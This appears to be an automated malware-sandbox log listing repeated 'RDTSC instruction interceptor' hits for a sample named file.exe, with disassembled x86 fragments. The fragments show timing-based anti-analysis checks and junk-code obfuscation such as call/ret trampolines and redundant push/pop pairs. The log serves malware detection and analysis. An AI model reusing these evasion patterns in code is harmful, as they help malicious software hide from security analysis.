Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1171D7F second address: 1171D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1165FDC second address: 1165FE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1172155 second address: 1172162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1172162 second address: 117216F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 jnl 00007FCC24D21136h 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117216F second address: 117217A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FCC24F87256h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117217A second address: 1172180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1172826 second address: 117282D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1172ACC second address: 1172AFC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FCC24D21152h 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007FCC24D21136h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1172AFC second address: 1172B22 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCC24F87261h 0x0000000e jnl 00007FCC24F8725Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114A0AA second address: 114A0AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114A0AE second address: 114A0B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114A0B8 second address: 114A0C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FCC24D21136h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1178879 second address: 117887D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11799EB second address: 11799F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FCC24D21136h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11799F5 second address: 1179A27 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007FCC24F8725Bh 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 pop eax 0x00000016 pop eax 0x00000017 popad 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FCC24F8725Dh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1179A27 second address: 1179A2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1145161 second address: 114516B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FCC24F87256h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114516B second address: 1145175 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCC24D21136h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1145175 second address: 1145183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FCC24F87256h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1145183 second address: 114518D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCC24D21136h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1180E3A second address: 1180E40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1180E40 second address: 1180E46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1180E46 second address: 1180E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCC24F87268h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007FCC24F87256h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1180E70 second address: 1180E8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24D21148h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1180E8C second address: 1180E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1180538 second address: 1180547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jbe 00007FCC24D21136h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11809A6 second address: 11809B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FCC24F87256h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11809B4 second address: 11809C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24D2113Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1180B36 second address: 1180B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FCC24F87256h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1180B45 second address: 1180B49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1182CD6 second address: 1182D32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 xor dword ptr [esp], 3F50538Fh 0x0000000e call 00007FCC24F87259h 0x00000013 jmp 00007FCC24F8725Ch 0x00000018 push eax 0x00000019 push edi 0x0000001a je 00007FCC24F87266h 0x00000020 jmp 00007FCC24F87260h 0x00000025 pop edi 0x00000026 mov eax, dword ptr [esp+04h] 0x0000002a je 00007FCC24F87265h 0x00000030 jmp 00007FCC24F8725Fh 0x00000035 mov eax, dword ptr [eax] 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1182D32 second address: 1182D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1182D37 second address: 1182D3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1182D3D second address: 1182D53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FCC24D2113Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1182D53 second address: 1182D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1183139 second address: 118317E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24D21145h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FCC24D21142h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007FCC24D21146h 0x00000018 jmp 00007FCC24D21140h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11834BD second address: 11834DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FCC24F87268h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11839D2 second address: 11839D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11839D6 second address: 11839F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FCC24F87261h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11839F4 second address: 11839F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1183C99 second address: 1183C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1183E67 second address: 1183E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1183E6B second address: 1183E96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24F8725Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCC24F87268h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11844C9 second address: 11844CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1185DDC second address: 1185DE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1185DE0 second address: 1185E85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24D21144h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d jmp 00007FCC24D2113Eh 0x00000012 pop ecx 0x00000013 jns 00007FCC24D21140h 0x00000019 popad 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007FCC24D21138h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 00000019h 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 push 00000000h 0x00000037 mov dword ptr [ebp+124579CCh], ecx 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push edx 0x00000042 call 00007FCC24D21138h 0x00000047 pop edx 0x00000048 mov dword ptr [esp+04h], edx 0x0000004c add dword ptr [esp+04h], 0000001Dh 0x00000054 inc edx 0x00000055 push edx 0x00000056 ret 0x00000057 pop edx 0x00000058 ret 0x00000059 mov dword ptr [ebp+1246763Ch], edi 0x0000005f add dword ptr [ebp+1247C4C2h], ebx 0x00000065 xchg eax, ebx 0x00000066 jo 00007FCC24D21140h 0x0000006c pushad 0x0000006d push esi 0x0000006e pop esi 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118675A second address: 118675F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118675F second address: 1186764 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1188A66 second address: 1188A6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1188A6C second address: 1188A72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1188A72 second address: 1188A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1188A76 second address: 1188ADA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24D21143h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007FCC24D21138h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D2813h], edx 0x0000002c push 00000000h 0x0000002e clc 0x0000002f push 00000000h 0x00000031 mov dword ptr [ebp+1245766Fh], eax 0x00000037 xchg eax, ebx 0x00000038 jmp 00007FCC24D21146h 0x0000003d push eax 0x0000003e push esi 0x0000003f push eax 0x00000040 push edx 0x00000041 push ecx 0x00000042 pop ecx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1189492 second address: 1189507 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FCC24F8725Ah 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edi, dword ptr [ebp+122D2F23h] 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007FCC24F87258h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edi 0x00000035 call 00007FCC24F87258h 0x0000003a pop edi 0x0000003b mov dword ptr [esp+04h], edi 0x0000003f add dword ptr [esp+04h], 00000017h 0x00000047 inc edi 0x00000048 push edi 0x00000049 ret 0x0000004a pop edi 0x0000004b ret 0x0000004c add di, E67Dh 0x00000051 xchg eax, ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 push ebx 0x00000056 pop ebx 0x00000057 jmp 00007FCC24F87261h 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1189507 second address: 1189528 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24D2113Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FCC24D2113Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118BB4B second address: 118BBA4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FCC24F87256h 0x00000008 jmp 00007FCC24F87266h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007FCC24F8725Ch 0x00000015 jp 00007FCC24F87256h 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 jnl 00007FCC24F87256h 0x00000026 popad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a push ecx 0x0000002b jmp 00007FCC24F87267h 0x00000030 pop ecx 0x00000031 pushad 0x00000032 pushad 0x00000033 popad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118BBA4 second address: 118BBAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118EAAC second address: 118EAB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118EAB0 second address: 118EB3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24D21145h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FCC24D21138h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 push edi 0x00000028 sub dword ptr [ebp+122D2966h], ecx 0x0000002e pop edi 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007FCC24D21138h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 0000001Dh 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b and bl, FFFFFF8Ch 0x0000004e clc 0x0000004f push 00000000h 0x00000051 jmp 00007FCC24D2113Dh 0x00000056 xchg eax, esi 0x00000057 push eax 0x00000058 push edx 0x00000059 jnp 00007FCC24D21138h 0x0000005f pushad 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118FD9B second address: 118FE0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FCC24F87258h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push ebp 0x00000027 call 00007FCC24F87258h 0x0000002c pop ebp 0x0000002d mov dword ptr [esp+04h], ebp 0x00000031 add dword ptr [esp+04h], 00000018h 0x00000039 inc ebp 0x0000003a push ebp 0x0000003b ret 0x0000003c pop ebp 0x0000003d ret 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push esi 0x00000043 call 00007FCC24F87258h 0x00000048 pop esi 0x00000049 mov dword ptr [esp+04h], esi 0x0000004d add dword ptr [esp+04h], 00000014h 0x00000055 inc esi 0x00000056 push esi 0x00000057 ret 0x00000058 pop esi 0x00000059 ret 0x0000005a mov bx, 2B51h 0x0000005e xchg eax, esi 0x0000005f push eax 0x00000060 push edx 0x00000061 push ebx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118FE0E second address: 118FE13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118FE13 second address: 118FE18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1190F1C second address: 1190F2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCC24D2113Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119202C second address: 1192032 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118DCC1 second address: 118DCC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1192F91 second address: 1193030 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCC24F87268h 0x00000008 jmp 00007FCC24F87268h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov bl, D6h 0x00000015 jmp 00007FCC24F87261h 0x0000001a push 00000000h 0x0000001c mov di, bx 0x0000001f pushad 0x00000020 sbb edx, 288BD5D1h 0x00000026 jmp 00007FCC24F8725Ch 0x0000002b popad 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007FCC24F87258h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 push edx 0x00000049 mov edi, eax 0x0000004b pop edi 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007FCC24F87263h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1193030 second address: 1193034 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1193034 second address: 119303A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118FFBB second address: 118FFBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1194139 second address: 119413E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119413E second address: 11941D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCC24D21146h 0x00000008 jmp 00007FCC24D21141h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push edi 0x00000014 jng 00007FCC24D21138h 0x0000001a mov ebx, edi 0x0000001c pop edi 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007FCC24D21138h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 00000018h 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 mov dword ptr [ebp+122D3229h], edx 0x0000003f push 00000000h 0x00000041 movzx ebx, ax 0x00000044 xchg eax, esi 0x00000045 push eax 0x00000046 jbe 00007FCC24D21140h 0x0000004c jmp 00007FCC24D2113Ah 0x00000051 pop eax 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007FCC24D21144h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11941D1 second address: 11941DB instructions: 0x00000000 rdtsc 0x00000002 js 00007FCC24F87256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1191193 second address: 1191197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1191197 second address: 119119D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1195318 second address: 119532B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24D2113Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11931D9 second address: 11931E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11942DD second address: 11942EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11942EB second address: 11942EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119624C second address: 1196252 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11942EF second address: 1194306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24F87263h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1196252 second address: 1196259 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
